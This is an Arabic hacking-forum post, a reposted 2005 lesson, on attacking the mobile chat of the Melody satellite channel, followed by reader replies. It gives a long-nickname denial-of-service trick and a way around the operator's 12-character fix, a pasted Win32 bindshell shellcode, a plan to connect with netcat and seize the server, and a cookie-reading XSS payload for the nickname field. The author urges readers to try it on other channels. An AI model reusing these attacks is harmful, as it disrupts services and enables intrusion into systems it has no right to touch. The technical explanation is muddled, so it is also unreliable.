اختراق Chat القنوات الفضائيه!

بسم الله الرحمن الرحيم

السلام عليكم

هذا الدرس طرح سنة Sep 14 2005, 12:59 AM
انا اريد اعادة طرح فقط للاستفادة الموضوع قيم ولكن جيد
على العموم الدرس هيبعد عن السلسله بحد ما ولكن مرتبط باول موضوع فيها

طبعا فى ظل الظروف الراهنه والقنوات الفضائيه نازله ترخ على دماغتنا والفيديو كليب الى اكل

دماغ شبابنا ربنا يستر على الجيل ده جيل الديموقراطيه …

الموضوع ده اكتشفته من حوالى سنه بس كنت بحاول اطور نفسى فيه يعنى مثلا افهم

لغه الchat وهى الجافا (java) التى تتعامل مع الجوال (الموبايل) انا لست برمجا جافا

من عمل رسائل مصوره بالفيديو والعاب الى اخره …الهم

لنكون سباقين بالمواضيع عن الغرب نخش فى الموضوع …

هتكون ضحيتنا قناه ميلودى الانجليزيه وليست العربيهmelody

كيف اتيت بالثغره؟!!

لكى تقو بتسجيل فى قناتنا يجب ان تضغط على ** ثم الاسم المستعار

تذكر الدرس السابق وتفهمه لكى تعرف كيف جاءت هذه الثغره لاتنزل لاسفل لتعرف الحل

اعرفها وبعد كده انزل لتحت

كيف جاءت الثغره؟!!

لب المشكله ياتى فى هاتين العلامتين ** لو حتى لا تفقه شىء فى لغه الjava ولا عمرك

سمعت عنها ولو يوجد عندك شويه معلوات بالمتغيرات او اى لغه اخرى مكن تعرفها زى بكل سهوله

عندما تضغط على هاتين العلامتين** يقو م بحجز متغير!!!

لماذا ليقو بالتسجيل اسمك المستعار بهذا الشكل **bigboss وبعد ان يقو م بالتسجيل فى القناه

يكون هكذا bigboss: كل شويه بقرب من النقطه المهمه

اعتقد ان النقطه بانت وواضح انها ثغره BuFFer OvErFloW ولاحظ ايضا ان المبرمج لم يتم اخذ

الامان !! سنعرفها اسفل …

استغلال الثغره ؟!!

الاستغلال لحد وقتنا هذا لم اكتبه لانى لست مبرمج للجافا ولكن عندى طريق تعمل على حجب

خدمه الاتشات **aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa aaaaaaaaaaaaa aaaaaaaaaeslam eslam bigboss
من القناه وهى كالاتى تقوم بالتسجيل باكتر من حرف فى المتغير هكذا …

الى ان ينتهى بك الحال الى 255 حرف الى موجود عندك على الموبايل اعتقد او اقل من كده

وارسل وسجل وارسل اى رساله سيقوم الاتشات بالحجب وستلاحظ ايضا… ان الاسم المستعار

طفح او عمل overflow على الاعلانات التى توجد بداخل القناه

طريقت اغلاقها ؟!!

طبعا القناه عرفت المشكله وقامو ***ق المتغير او ** الى 12 حرف

يجب الا يزيد عدد الحروف الاسم المستعار عن 12 حرف

طبعا اتقفلت الثغره وطبعا انا حابب انكم تجربوها على اكتر من قناه

تجاوز المشكله.؟!!

ممكن اتجاوز المشكله التى هى 12حرف بعمل الابتسمات على اسمك المستعار هكذا

** : ( اى ابتسامات وعدم كتابت اى حروف فى الاسم المستعار

ان بصراحه لسه ما جربتها ومست***م تجربوها لانى مشغول جداااااا حاليا والله يعلم بحالى

وممكن نرفق shell code بالجافا مثل هذا

Win32 bindshell (port 28876) - SkyLined

my $shellcode = “shellcode = unescape("%u4343"+"%u4343"+"%u43eb”.
“%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u 31ea”.
“%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u 85c7”.
“%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u 8b4b”.
“%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u 8b64”.
“%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u 6c6c”.
“%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%u e8fe”.
“%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%u fec0”.
“%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u 5050”.
“%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u 31c6”.
“%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u 5650”.
“%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u 58fa”.
“%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%u c656”.
“%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u 41e1”.
“%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u 5353”.
“%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u 5353”.
“%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%u fffe”.
“%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u 56ff”.
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u 89eb");
";

اخذته من ثغرهhttp://www.milw0rm.com/id.php?id=1079

وناتى بالادوار الاحترافيه مثل نعرف رقم ip الجهاز الذى يعمل الchat عليه ثم نتصل بالNETCAT

ونسيطر على القناه ولكن هذه فعلا ادوار الهاكر المحترف والحقيقى ليخسر شركه زى

ميلودى او اى قناه اخرى…

وطريقه مثل كود الجافا خبيث مثل هذا <script>alert(document.cookie);</Script>

ارفقه فى الاسم المستعار واشتغل

يعطيك الصحة خويا اندوشكا .

سلمت

الله يعطيك العاافيه

لاهنت

مشكور على الطريقة اندوشكا

وان شاء الله بجربها في اقرب فرصة

بالتوفيق للجميع

2010

استغربت اصلا لما شفت رابط milw0rm
ايش الي رجعه هههههههههه